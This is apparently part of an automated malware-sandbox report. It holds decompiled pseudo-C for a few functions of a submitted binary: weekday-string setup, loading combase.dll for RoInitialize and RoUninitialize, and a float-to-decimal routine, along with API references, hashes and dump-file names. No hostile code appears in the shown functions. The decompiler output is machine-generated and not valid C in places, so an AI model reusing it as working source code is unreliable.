				if(_t11 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t23 * 4)) + 4))) {
					L00CFDC67(_t11, 0xd464d4);
					__eflags =  *0xd464d4 - 0xffffffff;
					if(__eflags == 0) {
						E00CFDF39(_t24, __eflags, E00CB30D0);
						L00CFDCDD(0xd464d4);
					}
				}
				E00CB579C(0xd4642c, L"Sunday", 6);
				E00CB579C(0xd46438, L"Monday", 6);
				E00CB579C(0xd46444, L"Tuesday", 7);
				E00CB579C(0xd46450, L"Wednesday", 9);
				E00CB579C(0xd4645c, L"Thursday", 8);
				E00CB579C(0xd46468, L"Friday", 6);
				_t19 = E00CB579C(0xd46474, L"Saturday", 8);
				if( *0xd4648b < 0) {
					 *0xd46484 = 3;
					_t42 =  *0xd46480; // 0x0
				} else {
					_t42 = 0xd46480;
					_t19 = L00CB2BC0(_t22, 0xd46480, 8, 0xd46480, _t61, 3);
				}
				 *_t42 = 0x750053;
				 *((intOrPtr*)(_t42 + 4)) = 0x6e;
				if( *0xd46497 < 0) {
					 *0xd46490 = 3;
					_t43 =  *0xd4648c; // 0x0
				} else {
					_t43 = 0xd4648c;
					_t19 = L00CB2BC0(_t22, 0xd4648c, 8, 0xd4648c, _t61, 3);
				}
				 *_t43 = 0x6f004d;
				 *((intOrPtr*)(_t43 + 4)) = 0x6e;
				if( *0xd464a3 < 0) {
					 *0xd4649c = 3;
					_t44 =  *0xd46498; // 0x0
				} else {
					_t44 = 0xd46498;
					_t19 = L00CB2BC0(_t22, 0xd46498, 8, 0xd46498, _t61, 3);
				}
				 *_t44 = 0x750054;
				 *((intOrPtr*)(_t44 + 4)) = 0x65;
				if( *0xd464af < 0) {
					 *0xd464a8 = 3;
					_t45 =  *0xd464a4; // 0x0
				} else {
					_t45 = 0xd464a4;
					_t19 = L00CB2BC0(_t22, 0xd464a4, 8, 0xd464a4, _t61, 3);
				}
				 *_t45 = 0x650057;
				 *((intOrPtr*)(_t45 + 4)) = 0x64;
				if( *0xd464bb < 0) {
					 *0xd464b4 = 3;
					_t46 =  *0xd464b0; // 0x0
				} else {
					_t46 = 0xd464b0;
					_t19 = L00CB2BC0(_t22, 0xd464b0, 8, 0xd464b0, _t61, 3);
				}
				 *_t46 = 0x680054;
				 *((intOrPtr*)(_t46 + 4)) = 0x75;
				if( *0xd464c7 < 0) {
					 *0xd464c0 = 3;
					_t47 =  *0xd464bc; // 0x0
				} else {
					_t47 = 0xd464bc;
					_t19 = L00CB2BC0(_t22, 0xd464bc, 8, 0xd464bc, _t61, 3);
				}
				 *_t47 = 0x720046;
				 *((intOrPtr*)(_t47 + 4)) = 0x69;
				if( *0xd464d3 < 0) {
					 *0xd464cc = 3;
					_t48 =  *0xd464c8; // 0x0
				} else {
					_t48 = 0xd464c8;
					_t19 = L00CB2BC0(_t22, 0xd464c8, 8, 0xd464c8, _t61, 3);
				}
				 *_t48 = 0x610053;
				 *((intOrPtr*)(_t48 + 4)) = 0x74;
				return _t19;
			}

0x00cb11f0
0x00cb11f0
0x00cb11f5
0x00cb11fa
0x00cb1207
0x00cb1210
0x00cb142a
0x00cb1432
0x00cb1439
0x00cb1444
0x00cb1451
0x00cb1456
0x00cb1439
0x00cb1226
0x00cb1236
0x00cb1247
0x00cb1258
0x00cb126d
0x00cb127d
0x00cb128d
0x00cb1299
0x00cb12ae
0x00cb12b8
0x00cb129b
0x00cb129b
0x00cb12a7
0x00cb12a7
0x00cb12be
0x00cb12c4
0x00cb12d2
0x00cb12e7
0x00cb12f1
0x00cb12d4
0x00cb12d4
0x00cb12e0
0x00cb12e0
0x00cb12f7
0x00cb12fd
0x00cb130b
0x00cb1320
0x00cb132a
0x00cb130d
0x00cb130d
0x00cb1319
0x00cb1319
0x00cb1330
0x00cb1336
0x00cb1344
0x00cb1359
0x00cb1363
0x00cb1346
0x00cb1346
0x00cb1352
0x00cb1352
0x00cb1369
0x00cb136f
0x00cb137d
0x00cb1392
0x00cb139c
0x00cb137f
0x00cb137f
0x00cb138b
0x00cb138b
0x00cb13a2
0x00cb13a8
0x00cb13b6
0x00cb13cb
0x00cb13d5
0x00cb13b8
0x00cb13b8
0x00cb13c4
0x00cb13c4
0x00cb13db
0x00cb13e1
0x00cb13ef
0x00cb1404
0x00cb140e
0x00cb13f1
0x00cb13f1
0x00cb13fd
0x00cb13fd
0x00cb1414
0x00cb141a
0x00cb1424

APIs

__Init_thread_header.LIBCMT ref: 00CB142A

Strings

Sunday, xrefs: 00CB1221
Monday, xrefs: 00CB1231
Saturday, xrefs: 00CB1288
Wednesday, xrefs: 00CB1253
Friday, xrefs: 00CB1278
Tuesday, xrefs: 00CB1242
Thursday, xrefs: 00CB1268

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Init_thread_header
String ID: Friday$Monday$Saturday$Sunday$Thursday$Tuesday$Wednesday
API String ID: 3738618077-1471634407
Opcode ID: ba841dd76ead633f057a5c554e4d973fb102262b0beb30d28495b8f996dbb56d
Instruction ID: 39e5e4536f82c3a81683cc758eebf4284c62097087056714a2d4ecb9e17357b0
Opcode Fuzzy Hash: ba841dd76ead633f057a5c554e4d973fb102262b0beb30d28495b8f996dbb56d
Instruction Fuzzy Hash: C351B7B8A4C350AFEF109F50D8297553B95A703B24F04442CEA4F6B3D1DBB5A84897B3

Uniqueness

Uniqueness Score: -1.00%

Function 00CC1520 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 91
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00CC1520(void* __ecx, void* __fp0) {
				void* _v16;
				signed int _v24;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t11;
				intOrPtr _t17;
				struct HINSTANCE__* _t19;
				_Unknown_base(*)()* _t20;
				struct HINSTANCE__* _t26;
				signed int _t29;
				_Unknown_base(*)()* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t42;
				signed int _t43;
				void* _t45;
				void* _t46;

				_t45 = (_t43 & 0xfffffff0) - 0x30;
				_t40 = __ecx;
				_t11 =  *0xd40014; // 0xfbddd969
				_v24 = _t11 ^ _t42;
				_t13 =  *0xd469d4; // 0x0
				_t29 =  *0xd43e38; // 0x0
				_t38 =  *[fs:0x2c];
				if(_t13 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t29 * 4)) + 4))) {
					_t13 = L00CFDC67(_t13, 0xd469d4);
					_t46 = _t45 + 4;
					if( *0xd469d4 == 0xffffffff) {
						_t17 =  *0xd469dc; // 0x0
						_t34 =  *0xd43e38; // 0x0
						_t38 =  *[fs:0x2c];
						if(_t17 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t34 * 4)) + 4))) {
							L00CFDC67(_t17, 0xd469dc);
							_t46 = _t46 + 4;
							if( *0xd469dc == 0xffffffff) {
								asm("pcmpeqd xmm0, xmm0");
								asm("movdqa [esp+0x10], xmm0");
								_t27 = _t46;
								L00CC4C80(_t46, "operator()", "..\\..\\base\\win\\scoped_winrt_initializer.cc", 0x19);
								_t39 =  &_v48;
								L00CCB520(_t46,  &_v48, _t38, __fp0, _t27, 0xd469e0);
								_t26 = LoadLibraryExW(L"combase.dll", 0, 0x800);
								E00CCB620(_t26,  &_v48, _t39, __fp0);
								 *0xd469d8 = _t26;
								L00CFDCDD(0xd469dc);
								_t46 = _t46 + 0x14;
							}
						}
						_t19 =  *0xd469d8; // 0x0
						if(_t19 == 0) {
							_t20 = 0;
						} else {
							_t20 = GetProcAddress(_t19, "RoInitialize");
						}
						 *0xd469d0 = _t20;
						_t13 = L00CFDCDD(0xd469d4);
					}
				}
				_t31 =  *0xd469d0; // 0x0
				if(_t31 == 0) {
					_t41 = 0x80004005;
				} else {
					 *0xd57000();
					_t41 =  *_t31(_t40);
				}
				E00CFE643(_t13, _t26, _v24 ^ _t42, _t38, _t39, _t41);
				return _t41;
			}

0x00cc1529
0x00cc152c
0x00cc152e
0x00cc1535
0x00cc1539
0x00cc153e
0x00cc1544
0x00cc1554
0x00cc158c
0x00cc1591
0x00cc159b
0x00cc159d
0x00cc15a2
0x00cc15a8
0x00cc15b8
0x00cc15ef
0x00cc15f4
0x00cc15fe
0x00cc1600
0x00cc1604
0x00cc160a
0x00cc1619
0x00cc1621
0x00cc162d
0x00cc1644
0x00cc1648
0x00cc164d
0x00cc1658
0x00cc165d
0x00cc165d
0x00cc15fe
0x00cc15ba
0x00cc15c1
0x00cc15d1
0x00cc15c3
0x00cc15c9
0x00cc15c9
0x00cc15d3
0x00cc15dd
0x00cc15e2
0x00cc159b
0x00cc1556
0x00cc155e
0x00cc156d
0x00cc1560
0x00cc1560
0x00cc1569
0x00cc1569
0x00cc1578
0x00cc1586

APIs

__Init_thread_header.LIBCMT ref: 00CC158C
GetProcAddress.KERNEL32(00000000,RoInitialize), ref: 00CC15C9
__Init_thread_header.LIBCMT ref: 00CC15EF

Part of subcall function 00CFDC67: EnterCriticalSection.KERNEL32(00D43DF0,?,?,?,00CD5D50,00D53ED0,?,?,?,?,00CD5B17,00000000,00000000), ref: 00CFDC72
Part of subcall function 00CFDC67: LeaveCriticalSection.KERNEL32(00D43DF0,?,?,?,00CD5D50,00D53ED0,?,?,?,?,00CD5B17,00000000,00000000), ref: 00CFDCAF

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,?,00D469E0,?,?,?,?,?,?,?,?,?,?,?), ref: 00CC163E

Strings

combase.dll, xrefs: 00CC1639
RoInitialize, xrefs: 00CC15C3
..\..\base\win\scoped_winrt_initializer.cc, xrefs: 00CC160E
operator(), xrefs: 00CC1613

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: CriticalInit_thread_headerSection$AddressEnterLeaveLibraryLoadProc
String ID: ..\..\base\win\scoped_winrt_initializer.cc$RoInitialize$combase.dll$operator()
API String ID: 882557473-4077768022
Opcode ID: 7efb1724dd0153c8cc751055f714ded0bf99d7943eec02a1c2c57ba96931f5e4
Instruction ID: ddf83a6fb7b2e0fbe8a7284bf4806e8bb92fba7366f31a10d6c8197b790a21c3
Opcode Fuzzy Hash: 7efb1724dd0153c8cc751055f714ded0bf99d7943eec02a1c2c57ba96931f5e4
Instruction Fuzzy Hash: 5631B475A013809FD2109F29ED42F257365AB87720F18053EF913D7392DBB19A048EA3

Uniqueness

Uniqueness Score: -1.00%

Function 00CC1670 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 86
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00CC1670(void* __ebx, intOrPtr* __ecx, void* __fp0) {
				void* _v12;
				signed int _v16;
				char _v44;
				void* __edi;
				void* __esi;
				signed int _t12;
				intOrPtr _t16;
				struct HINSTANCE__* _t18;
				_Unknown_base(*)()* _t19;
				signed int _t29;
				_Unknown_base(*)()* _t31;
				signed int _t32;
				struct HINSTANCE__* _t37;
				signed int _t40;
				signed int _t41;
				void* _t43;
				void* _t45;

				_t25 = __ebx;
				_t43 = (_t41 & 0xfffffff0) - 0x30;
				_t12 =  *0xd40014; // 0xfbddd969
				_t13 = _t12 ^ _t40;
				_v16 = _t12 ^ _t40;
				 *__ecx = 0xd2f078;
				if( *((intOrPtr*)(__ecx + 4)) >= 0) {
					_t13 =  *0xd469e8; // 0x0
					_t29 =  *0xd43e38; // 0x0
					_t36 =  *[fs:0x2c];
					if(_t13 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t29 * 4)) + 4))) {
						_t13 = L00CFDC67(_t13, 0xd469e8);
						_t45 = _t43 + 4;
						if( *0xd469e8 == 0xffffffff) {
							_t16 =  *0xd469dc; // 0x0
							_t32 =  *0xd43e38; // 0x0
							_t36 =  *[fs:0x2c];
							if(_t16 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t32 * 4)) + 4))) {
								L00CFDC67(_t16, 0xd469dc);
								_t45 = _t45 + 4;
								if( *0xd469dc == 0xffffffff) {
									asm("pcmpeqd xmm0, xmm0");
									asm("movdqa [esp+0x10], xmm0");
									L00CC4C80(_t45, "operator()", "..\\..\\base\\win\\scoped_winrt_initializer.cc", 0x19);
									_t39 =  &_v44;
									L00CCB520(__ebx,  &_v44, _t36, __fp0, _t45, 0xd469e0);
									_t37 = LoadLibraryExW(L"combase.dll", 0, 0x800);
									E00CCB620(__ebx,  &_v44, _t37, __fp0);
									 *0xd469d8 = _t37;
									L00CFDCDD(0xd469dc);
									_t45 = _t45 + 0x14;
								}
							}
							_t18 =  *0xd469d8; // 0x0
							if(_t18 == 0) {
								_t19 = 0;
							} else {
								_t19 = GetProcAddress(_t18, "RoUninitialize");
							}
							 *0xd469e4 = _t19;
							_t13 = L00CFDCDD(0xd469e8);
						}
					}
					_t31 =  *0xd469e4; // 0x0
					if(_t31 != 0) {
						 *0xd57000();
						_t13 =  *_t31();
					}
				}
				return E00CFE643(_t13, _t25, _v16 ^ _t40, _t36, _t37, _t39);
			}

0x00cc1670
0x00cc1678
0x00cc167b
0x00cc1680
0x00cc1682
0x00cc1686
0x00cc1690
0x00cc1692
0x00cc1697
0x00cc169d
0x00cc16ad
0x00cc16d8
0x00cc16dd
0x00cc16e7
0x00cc16e9
0x00cc16ee
0x00cc16f4
0x00cc1704
0x00cc173b
0x00cc1740
0x00cc174a
0x00cc174c
0x00cc1750
0x00cc1765
0x00cc176d
0x00cc1779
0x00cc1790
0x00cc1794
0x00cc1799
0x00cc17a4
0x00cc17a9
0x00cc17a9
0x00cc174a
0x00cc1706
0x00cc170d
0x00cc171d
0x00cc170f
0x00cc1715
0x00cc1715
0x00cc171f
0x00cc1729
0x00cc172e
0x00cc16e7
0x00cc16af
0x00cc16b7
0x00cc16b9
0x00cc16bf
0x00cc16bf
0x00cc16b7
0x00cc16d2

APIs

__Init_thread_header.LIBCMT ref: 00CC16D8
GetProcAddress.KERNEL32(00000000,RoUninitialize), ref: 00CC1715
__Init_thread_header.LIBCMT ref: 00CC173B
LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,?,00D469E0), ref: 00CC178A

Strings

combase.dll, xrefs: 00CC1785
RoUninitialize, xrefs: 00CC170F
..\..\base\win\scoped_winrt_initializer.cc, xrefs: 00CC175A
operator(), xrefs: 00CC175F

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Init_thread_header$AddressLibraryLoadProc
String ID: ..\..\base\win\scoped_winrt_initializer.cc$RoUninitialize$combase.dll$operator()
API String ID: 900114960-1867938867
Opcode ID: ec09158013e49d2fcab1bf6e9d24514dcbeb8cd613a4a155e072eb55e5cc1960
Instruction ID: ccd6199086b9e821d9800b91a5e639ccc7c60368695463c21a917ebb6a89e876
Opcode Fuzzy Hash: ec09158013e49d2fcab1bf6e9d24514dcbeb8cd613a4a155e072eb55e5cc1960
Instruction Fuzzy Hash: 1B31CE74A013409FD3109F29DD46F2933A1AB87720F18012EF916823D2DBB1AA46CE63

Uniqueness

Uniqueness Score: -1.00%

Function 00CED8D8 Relevance: 12.4, APIs: 8, Instructions: 367
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00CED8D8(signed int _a4, unsigned int _a8, signed int _a12, char* _a16, intOrPtr _a20, signed int* _a24, signed int* _a28) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _t144;
				signed int _t155;
				unsigned int _t157;
				signed int _t158;
				signed int _t172;
				signed int _t185;
				signed int _t192;
				signed int _t200;
				signed int _t203;
				signed int _t206;
				signed int _t210;
				char* _t212;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				signed int _t223;
				signed int _t228;
				signed int _t230;
				signed int _t231;
				signed char _t235;
				signed int _t236;
				signed char _t237;
				signed int _t245;
				signed int _t246;
				signed int _t249;
				signed int _t252;
				signed char _t256;
				unsigned int _t258;
				signed int _t260;
				signed int* _t261;
				signed int _t262;
				signed int _t263;
				signed int _t266;
				void* _t269;
				signed int* _t271;
				signed int _t275;
				intOrPtr _t276;
				unsigned int _t278;
				unsigned int _t280;
				unsigned int _t282;
				signed int _t285;
				char* _t287;
				signed int _t288;
				signed int _t291;
				void* _t294;
				intOrPtr _t301;
				signed int* _t302;
				signed int _t309;
				void* _t315;

				_t144 = _a4;
				_t258 = _a8;
				asm("adc edi, 0xfffff");
				asm("adc edi, 0x0");
				_t210 =  ==  ? _t144 : _t144;
				_t285 =  ==  ? _t258 & 0x000fffff : _t258 & 0x000fffff;
				_t260 =  !=  ? (_t258 >> 0x00000014 & 0x000007ff) + 0xfffffbcd : 0xfffffbce;
				_t228 = _a12;
				if(_t228 > 0x14 || 0xfffffbce > 0x14) {
					L43:
					return (_t144 & 0xffffff00 | _t260 - 0x00000015 < 0x00000000) & (_t228 & 0xffffff00 | _t228 - 0x00000015 < 0x00000000);
				} else {
					_t301 = _a20;
					 *_a24 = 0;
					_v28 = 0xfffffbce;
					if(0xfffffbce < 0xc) {
						__eflags = 0xfffffbce;
						if(0xfffffbce < 0) {
							__eflags = 0xfffffbce - 0xffffffcc;
							if(0xfffffbce < 0xffffffcc) {
								__eflags = 0xfffffbce - 0xffffff7f;
								if(0xfffffbce > 0xffffff7f) {
									_t261 = _a28;
									 *_t261 = 0;
									_t230 = _t210;
									_t262 = _t285;
									_push(_t261);
									_t302 = _a24;
									_push(_t302);
									_push(_t301);
									_t287 = _a16;
									_push(_t287);
									_push(_a12);
									_push(_t260);
									L24:
									L00CEDE64(_t230, _t262);
									L25:
									_t144 =  *_t302;
									if(_t144 <= 0) {
										_t260 = _v28;
										L41:
										 *((char*)(_t287 + _t144)) = 0;
										_t228 = _a12;
										if( *_t302 == 0) {
											_t144 =  ~_t228;
											 *_a28 = _t144;
										}
										goto L43;
									}
									_t260 = _v28;
									while( *((char*)(_t287 + _t144 - 1)) == 0x30) {
										_t144 = _t144 - 1;
										 *_t302 = _t144;
										if(_t144 + 1 > 1) {
											continue;
										}
										goto L41;
									}
									_t231 = 0;
									__eflags = 0;
									while(1) {
										__eflags =  *((char*)(_t287 + _t231)) - 0x30;
										if( *((char*)(_t287 + _t231)) != 0x30) {
											break;
										}
										_t231 = _t231 + 1;
										__eflags = _t144 - _t231;
										if(_t144 != _t231) {
											continue;
										}
										_t231 = _t144;
										break;
									}
									__eflags = _t231;
									if(_t231 == 0) {
										_t302 = _a24;
										goto L41;
									}
									__eflags = _t231 - _t144;
									_t302 = _a24;
									_t212 = _t287;
									if(_t231 >= _t144) {
										L39:
										 *_t302 = _t144 - _t231;
										 *_a28 =  *_a28 - _t231;
										_t144 =  *_t302;
										_t260 = _v28;
										_t287 = _t212;
										goto L41;
									}
									_t263 = 0;
									__eflags = 0;
									_t288 = _t231;
									do {
										 *((char*)(_t212 + _t263)) =  *((intOrPtr*)(_t212 + _t288));
										_t288 = _t288 + 1;
										_t144 =  *_t302;
										_t263 = _t263 + 1;
										__eflags = _t288 - _t144;
									} while (_t288 < _t144);
									goto L39;
								}
								_t287 = _a16;
								 *_t287 = 0;
								_t302 = _a24;
								 *_t302 = 0;
								_t155 =  ~_t228;
								L7:
								 *_a28 = _t155;
								goto L25;
							}
							_t235 =  ~_t260;
							_t157 = _t285 >> _t235;
							__eflags = _t235 & 0x00000020;
							_t266 =  !=  ? _t157 : (_t285 << 0x00000020 | _t210) >> _t235;
							_v24 = _t266 << _t235;
							_v20 = 0;
							__eflags = _t235 & 0x00000020;
							_t158 =  !=  ? 0 : _t157;
							_t308 =  ==  ? _v24 : _v20;
							_v20 =  ==  ? _v24 : _v20;
							_t309 = _t266;
							__eflags = _t235 & 0x00000020;
							_t269 =  !=  ? _v24 : (_t158 << 0x00000020 | _t309) << _t235;
							_t214 = _t210 - _v20;
							asm("sbb edi, edx");
							_t236 = _t309;
							__eflags = _t158;
							if(__eflags == 0) {
								_t302 = _a24;
								L00CEDCC3(_t236, _a16, _a20, _t302);
								_t315 = _t315 + 8;
							} else {
								_t302 = _a24;
								L00CEDD30(_t236, _t158, __eflags, _a16, _a20, _t302);
								_t315 = _t315 + 0xc;
							}
							_t271 = _a28;
							 *_t271 =  *_t302;
							_t230 = _t214;
							_t262 = _t285;
							_push(_t271);
							_push(_t302);
							_push(_a20);
							_t287 = _a16;
							_push(_t287);
							_push(_a12);
							_push(_v28);
							goto L24;
						}
						_t237 = _t260;
						_t215 = _t210 << _t237;
						__eflags = _t260 & 0x00000020;
						_t290 =  !=  ? _t215 : (_t285 << 0x00000020 | _t210) << _t237;
						_t239 =  ==  ? _t215 : 0;
						__eflags =  ==  ? _t215 : 0;
						_t273 =  !=  ? _t215 : (_t285 << 0x00000020 | _t210) << _t237;
						_t302 = _a24;
						_t287 = _a16;
						L00CEDD30( ==  ? _t215 : 0,  !=  ? _t215 : (_t285 << 0x00000020 | _t210) << _t237,  ==  ? _t215 : 0, _t287, _t301, _t302);
						_t155 =  *_t302;
						goto L7;
					}
					if(0xfffffbce < 0x12) {
						__eflags = 0;
						_t243 =  !=  ? 0xa2bc2ec5 : 0xffffffffa2beffed << 0x11;
						_v24 =  !=  ? 0xa2bc2ec5 : 0xffffffffa2beffed << 0x11;
						_t312 =  !=  ? 0 : 0xa2bc2ec5 << 0x11;
						_v20 = E00D18380(_t210, _t285, 0xa2bc2ec5,  !=  ? 0xa2bc2ec5 : 0xffffffffa2beffed << 0x11);
						_t172 = L00D23E20(_t210, _t285,  !=  ? 0 : 0xa2bc2ec5 << 0x11, _v24);
						_t217 = _t172 << 0x11;
						_t245 = _v20;
						__eflags = _v28 & 0x00000020;
						_t275 =  !=  ? _t217 : (_t260 << 0x00000020 | _t172) << 0x11;
						_t218 =  !=  ? 0 : _t217;
					} else {
						_t256 = _t260 + 0xef;
						_t223 = _t210 << _t256;
						_t296 =  !=  ? _t223 : (_t285 << 0x00000020 | _t210) << _t256;
						_t202 =  ==  ? _t223 : 0;
						_t224 =  ==  ? _t223 : 0;
						_t203 = E00D18380(0,  !=  ? _t223 : (_t285 << 0x00000020 | _t210) << _t256, 0xa2bc2ec5, 0xb1);
						_t206 = L00D23E20( ==  ? _t223 : 0,  !=  ? _t223 : (_t285 << 0x00000020 | _t210) << _t256, 0xa2bc2ec5, 0xb1);
						_t245 = _t203;
						_t275 = (0xa2bc2ec5 << 0x00000020 | _t206) << 0x11;
						_t218 = _t206 << 0x11;
					}
					_t302 = _a24;
					_t291 = _t275;
					_t276 = _a16;
					L00CEDCC3(_t245, _t276, _a20, _t302);
					_v36 = E00D18380(_t218, _t291, 0x989680, 0);
					_v32 = _t276;
					_v24 = _t291;
					_v20 = _t218;
					_t246 = E00D18380(_t218, _t291, 0x107a4000, 0x5af3);
					_t219 = 4;
					do {
						_t278 = _t246 * 0xcccccccd >> 0x20 >> 3;
						 *(_t219 +  *_t302 + _a16 - 2) = _t246 - _t278 + _t278 + (_t278 + _t278) * 0x00000004 | 0x00000030;
						_t219 = _t219 - 1;
						_t246 = _t278;
					} while (_t219 > 1);
					_t185 = L00D23E20(_v36, _v32, 0x989680, 0);
					 *_t302 =  *_t302 + 3;
					_t249 = _t185;
					_t220 = 8;
					do {
						_t280 = _t249 * 0xcccccccd >> 0x20 >> 3;
						 *(_t220 +  *_t302 + _a16 - 2) = _t249 - _t280 + _t280 + (_t280 + _t280) * 0x00000004 | 0x00000030;
						_t220 = _t220 - 1;
						_t249 = _t280;
					} while (_t220 > 1);
					_t192 = L00D23E20(_v20, _v24, 0x989680, 0);
					 *_t302 =  *_t302 + 7;
					_t252 = _t192;
					_t294 = 8;
					do {
						_t282 = _t252 * 0xcccccccd >> 0x20 >> 3;
						 *(_t294 +  *_t302 + _a16 - 2) = _t252 - _t282 + _t282 + (_t282 + _t282) * 0x00000004 | 0x00000030;
						_t294 = _t294 - 1;
						_t252 = _t282;
					} while (_t294 > 1);
					_t200 =  *_t302 + 7;
					 *_t302 = _t200;
					 *_a28 = _t200;
					_t287 = _a16;
					goto L25;
				}
			}

0x00ced8e1
0x00ced8e4
0x00ced8f6
0x00ced8ff
0x00ced919
0x00ced91c
0x00ced924
0x00ced927
0x00ced92d
0x00cedcad
0x00cedcc2
0x00ced93c
0x00ced93f
0x00ced942
0x00ced94b
0x00ced94e
0x00ced9ab
0x00ced9ad
0x00cedb4d
0x00cedb50
0x00cedbb9
0x00cedbbf
0x00cedc0c
0x00cedc0f
0x00cedc15
0x00cedc19
0x00cedc1b
0x00cedc1e
0x00cedc21
0x00cedc22
0x00cedc23
0x00cedc26
0x00cedc27
0x00cedc2a
0x00cedc2b
0x00cedc2b
0x00cedc33
0x00cedc33
0x00cedc37
0x00cedc50
0x00cedc98
0x00cedc98
0x00cedc9f
0x00cedca2
0x00cedca6
0x00cedcab
0x00cedcab
0x00000000
0x00cedca2
0x00cedc39
0x00cedc3c
0x00cedc43
0x00cedc44
0x00cedc4c
0x00000000
0x00000000
0x00000000
0x00cedc4e
0x00cedc55
0x00cedc55
0x00cedc57
0x00cedc57
0x00cedc5b
0x00000000
0x00000000
0x00cedc5d
0x00cedc5e
0x00cedc60
0x00000000
0x00000000
0x00cedc62
0x00000000
0x00cedc62
0x00cedc64
0x00cedc66
0x00cedc95
0x00000000
0x00cedc95
0x00cedc68
0x00cedc6a
0x00cedc6d
0x00cedc6f
0x00cedc83
0x00cedc85
0x00cedc8a
0x00cedc8c
0x00cedc8e
0x00cedc91
0x00000000
0x00cedc91
0x00cedc71
0x00cedc71
0x00cedc73
0x00cedc75
0x00cedc78
0x00cedc7b
0x00cedc7c
0x00cedc7e
0x00cedc7f
0x00cedc7f
0x00000000
0x00cedc75
0x00cedbc1
0x00cedbc4
0x00cedbc7
0x00cedbca
0x00cedbd2
0x00ced9dc
0x00ced9df
0x00000000
0x00ced9df
0x00cedb54
0x00cedb5d
0x00cedb5f
0x00cedb62
0x00cedb69
0x00cedb6c
0x00cedb73
0x00cedb7b
0x00cedb81
0x00cedb85
0x00cedb88
0x00cedb8f
0x00cedb92
0x00cedb96
0x00cedb99
0x00cedb9b
0x00cedb9d
0x00cedb9f
0x00cedbdc
0x00cedbe4
0x00cedbe9
0x00cedba1
0x00cedba3
0x00cedbaf
0x00cedbb4
0x00cedbb4
0x00cedbee
0x00cedbf1
0x00cedbf3
0x00cedbf7
0x00cedbf9
0x00cedbfa
0x00cedbfb
0x00cedbfe
0x00cedc01
0x00cedc02
0x00cedc05
0x00000000
0x00cedc05
0x00ced9b3
0x00ced9b8
0x00ced9bc
0x00ced9bf
0x00ced9c2
0x00ced9c2
0x00ced9c5
0x00ced9c9
0x00ced9ce
0x00ced9d2
0x00ced9da
0x00000000
0x00ced9da
0x00ced953
0x00ced9f9
0x00ced9fe
0x00ceda01
0x00ceda09
0x00ceda15
0x00ceda1e
0x00ceda28
0x00ceda2f
0x00ceda34
0x00ceda36
0x00ceda3e
0x00ced959
